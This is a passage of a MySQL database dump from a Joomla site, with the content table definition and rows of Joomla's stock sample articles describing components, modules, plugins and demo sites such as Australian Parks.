  `created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribs` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int unsigned NOT NULL DEFAULT '1',
  `ordering` int NOT NULL DEFAULT '0',
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `access` int unsigned NOT NULL DEFAULT '0',
  `hits` int unsigned NOT NULL DEFAULT '0',
  `metadata` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The language code for the article.',
  `xreference` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`),
  KEY `idx_alias` (`alias`(191))
) ENGINE=MyISAM AUTO_INCREMENT=102 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_content`
--

LOCK TABLES `fz6t4_content` WRITE;
/*!40000 ALTER TABLE `fz6t4_content` DISABLE KEYS */;
INSERT INTO `fz6t4_content` VALUES (1,89,'Administrator Components','administrator-components','<p>All components are also used in the administrator area of your website. In addition to the ones listed here, there are components in the administrator that do not have direct front end displays, but do help shape your site. The most important ones for most users are</p>\r\n<ul>\r\n<li>Media Manager</li>\r\n<li>Extensions Manager</li>\r\n<li>Menu Manager</li>\r\n<li>Global Configuration</li>\r\n<li>Banners</li>\r\n<li>Redirect</li>\r\n</ul>\r\n<hr title=\"Media Manager\" alt=\"Media Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<p> </p>\r\n<h3>Media Manager</h3>\r\n<p>The media manager component lets you upload and insert images into content throughout your site. Optionally, you can enable the flash uploader which will allow you to to upload multiple images. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Content_Media_Manager\">Help</a></p>\r\n<hr title=\"Extensions Manager\" alt=\"Extensions Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Extensions Manager</h3>\r\n<p>The extensions manager lets you install, update, uninstall and manage all of your extensions. The extensions manager has been extensively redesigned, although the core install and uninstall functionality remains the same as in Joomla! 1.5. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Extension_Manager_Install\">Help</a></p>\r\n<hr title=\"Menu Manager\" alt=\"Menu Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Menu Manager</h3>\r\n<p>The menu manager lets you create the menus you see displayed on your site. It also allows you to assign modules and template styles to specific menu links. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Menus_Menu_Manager\">Help</a></p>\r\n<hr title=\"Global Configuration\" alt=\"Global Configuration\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Global Configuration</h3>\r\n<p>The global configuration is where the site administrator configures things such as whether search engine friendly urls are enabled, the site meta data (descriptive text used by search engines and indexers) and other functions. For many beginning users simply leaving the settings on default is a good way to begin, although when your site is ready for the public you will want to change the meta data to match its content. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Site_Global_Configuration\">Help</a></p>\r\n<hr title=\"Banners\" alt=\"Banners\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Banners</h3>\r\n<p>The banners component provides a simple way to display a rotating image in a module and, if you wish to have advertising, a way to track the number of times an image is viewed and clicked. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Banners_Banners_Edit\">Help</a></p>\r\n<hr title=\"Redirect\" class=\"system-pagebreak\" />\r\n<h3><br />Redirect</h3>\r\n<p>The redirect component is used to manage broken links that produce Page Not Found (404) errors. If enabled it will allow you to redirect broken links to specific pages. It can also be used to manage migration related URL changes. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Redirect_Manager\">Help</a></p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:03:19',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,7,'','',1,4090,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2,90,'Archive Module','archive-module','<p>This module shows a list of the calendar months containing archived articles. After you have changed the status of an article to archived, this list will be automatically generated. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Articles_Archive\" title=\"Archive Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_archive,Archived Articles}</div>','',1,64,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:18:05',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',5,5,'modules, content','',1,4433,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(3,91,'Article Categories Module','article-categories-module','<p>This module displays a list of categories from one parent category. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Articles_Categories\" title=\"Categories Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_categories,Articles Categories}</div>\r\n<p> </p>','',1,64,'2011-01-01 00:00:01',676,'','2011-09-17 22:13:31',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',5,6,'modules, content','',1,2883,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(4,92,'Articles Category Module','articles-category-module','<p>This module allows you to display the articles in a specific category. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Articles_Category\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_category,Articles Category}</div>','',1,64,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:18:26',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',8,7,'','articles,content',1,2670,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(5,101,'Authentication','authentication','<p>The authentication plugins operate when users login to your site or administrator. The Joomla! authentication plugin is in operation by default but you can enable Gmail or LDAP or install a plugin for a different system. An example is included that may be used to create a new authentication plugin.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>Joomla <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Authentication_-_GMail\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<ul>\r\n<li>Gmail <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Authentication_-_GMail\">Help</a></li>\r\n<li>LDAP <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Authentication_-_LDAP\">Help</a></li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:04:13',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,3072,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(6,102,'Australian Parks ','australian-parks','<p><img src=\"images/sampledata/parks/banner_cradle.jpg\" border=\"0\" alt=\"Cradle Park Banner\" /></p>\r\n<p>Welcome!</p>\r\n<p>This is a basic site about the beautiful and fascinating parks of Australia.</p>\r\n<p>On this site you can read all about my travels to different parks, see photos, and find links to park websites.</p>\r\n<p><em>This sample site is an example of using the core of Joomla! to create a basic website, whether a \"brochure site,\"  a personal blog, or as a way to present information on a topic you are interested in.</em></p>\r\n<p><em> Read more about the site in the About Parks module.</em></p>\r\n<p> </p>','',1,26,'2011-01-01 00:00:01',676,'Parks Webmaster','2011-09-06 06:20:19',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,1,'','',1,2077,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(7,103,'Banner Module','banner-module','<p>The banner module is used to display the banners that are managed by the banners component in the site administrator. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Banners\">Help</a>.</p>\r\n<div class=\"sample-module\">{loadmodule banners,Banners}</div>','',1,66,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:32:58',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,6,'','',1,3197,'',0,'*','',''),(8,104,'Beginners','beginners','<p>If this is your first Joomla! site or your first web site, you have come to the right place. Joomla will help you get your website up and running quickly and easily.</p>\r\n<p>Start off using your site by logging in using the administrator account you created when you installed Joomla.</p>\r\n','\r\n<p>Explore the articles and other resources right here on your site data to learn more about how Joomla works. (When you\'re done reading, you can delete or archive all of this.) You will also probably want to visit the Beginners\' Areas of the <a href=\"http://docs.joomla.org/Beginners\">Joomla documentation</a> and <a href=\"http://forum.joomla.org\">support forums</a>.</p>\r\n<p>You\'ll also want to sign up for the Joomla Security Mailing list and the Announcements mailing list. For inspiration visit the <a href=\"http://community.joomla.org/showcase/\">Joomla! Site Showcase</a> to see an amazing array of ways people use Joomla to tell their stories on the web.</p>\r\n<p>The basic Joomla installation will let you get a great site up and running, but when you are ready for more features the power of Joomla is in the creative ways that developers have extended it to do all kinds of things. Visit the <a href=\"http://extensions.joomla.org/\">Joomla! Extensions Directory</a> to see thousands of extensions that can do almost anything you could want on a website. Can\'t find what you need? You may want to find a Joomla professional in the <a href=\"http://resources.joomla.org/\">Joomla! Resource Directory</a>.</p>\r\n<p>Want to learn more? Consider attending a <a href=\"http://community.joomla.org/events.html\">Joomla! Day</a> or other event or joining a local <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Can\'t find one near you? Start one yourself.</p>',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:10:49',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,4,'','',1,2774,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(9,105,'Contacts','contact','<p>The contact component provides a way to provide contact forms and information for your site or to create a complex directory that can be used for many different purposes. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Contacts_Contacts\">Help</a></p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-01-10 04:15:37',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,2,'','',1,2334,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(10,106,'Content','content','<p>The content component (com_content) is what you use to write articles. It is extremely flexible and has the largest number of built in views. Articles can be created and edited from the front end, making content the easiest component to use to create your site content. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Content_Article_Manager\">Help</a></p>','',1,21,'2011-01-01 00:00:01',676,'','2011-01-10 04:28:12',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,1,'','',1,3700,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(11,107,'Cradle Mountain','cradle-mountain','<p> </p>\r\n','\r\n<p> </p>',1,73,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 04:42:36',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/landscape\\/250px_cradle_mountain_seen_from_barn_bluff.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Cradle Mountain\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/landscape\\/800px_cradle_mountain_seen_from_barn_bluff.jpg\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"Cradle Mountain\",\"image_fulltext_caption\":\"Source: http:\\/\\/commons.wikimedia.org\\/wiki\\/File:Rainforest,bluemountainsNSW.jpg Author: Alan J.W.C. License: GNU Free Documentation License v . 1.2 or later\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,1,'','',1,1096,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(12,110,'Custom HTML Module','custom-html-module','<p>This module allows you to create your own HTML Module using a WYSIWYG editor. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Custom_HTML\" title=\"Custom HTML Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule custom,Custom HTML}</div>','',1,66,'2011-01-01 00:00:01',676,'','2011-12-27 11:12:46',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',13,1,'','',1,2437,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(13,111,'Directions','directions','<p>Here\'s how to find our shop.</p><p>By car</p><p>Drive along Main Street to the intersection with First Avenue.  Look for our sign.</p><p>By foot</p><p>From the center of town, walk north on Main Street until you see our sign.</p><p>By bus</p><p>Take the #73 Bus to the last stop. We are on the north east corner.</p>','',1,29,'2011-01-01 00:00:01',676,'Fruit Shop Webmaster','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,2,'','',1,1311,'',0,'*','',''),(14,112,'Editors','editors','<p>Editors are used thoughout Joomla! where content is created. TinyMCE is the default choice in most locations although CodeMirror is used in the template manager. No Editor provides a text box for html content.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>CodeMirror <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Editor_-_CodeMirror\">Help</a></li>\r\n<li>TinyMCE<a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Editor_-_TinyMCE\"> Help</a></li>\r\n<li>No Editor <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Editor_-_None\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<ul>\r\n<li>None</li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-09-06 05:45:40',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',2,5,'','',1,1269,'',0,'*','',''),(15,113,'Editors-xtd','editors-xtd','<p>These plugins are the buttons found beneath your editor. They only run when an editor plugin runs.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>Editor Button: Image<a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Button_-_Image\"> Help</a></li>\r\n<li>Editor Button: Readmore <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Button_-_Readmore\">Help</a></li>\r\n<li>Editor Button: Page Break <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Button_-_Pagebreak\">Help</a></li>\r\n<li>Editor Button: Article <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Button_-_Article\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<ul>\r\n<li>None</li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:14:12',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,6,'','',1,134,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(16,114,'Feed Display','feed-display','<p>This module allows the displaying of a syndicated feed. <a href=\"http://docs.joomla.org/Help15:Screen.modulessite.edit.15#Feed_Display\" title=\"Feed Display Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule feed,Feed Display}</div>','',1,66,'2011-01-01 00:00:01',676,'','2011-09-17 22:22:08',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',3,2,'','',1,2241,'',0,'*','',''),(17,115,'First Blog Post','first-blog-post','<p><em>Lorem Ipsum is filler text that is commonly used by designers before the content for a new site is ready.</em></p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed faucibus purus vitae diam posuere nec eleifend elit dictum. Aenean sit amet erat purus, id fermentum lorem. Integer elementum tristique lectus, non posuere quam pretium sed. Quisque 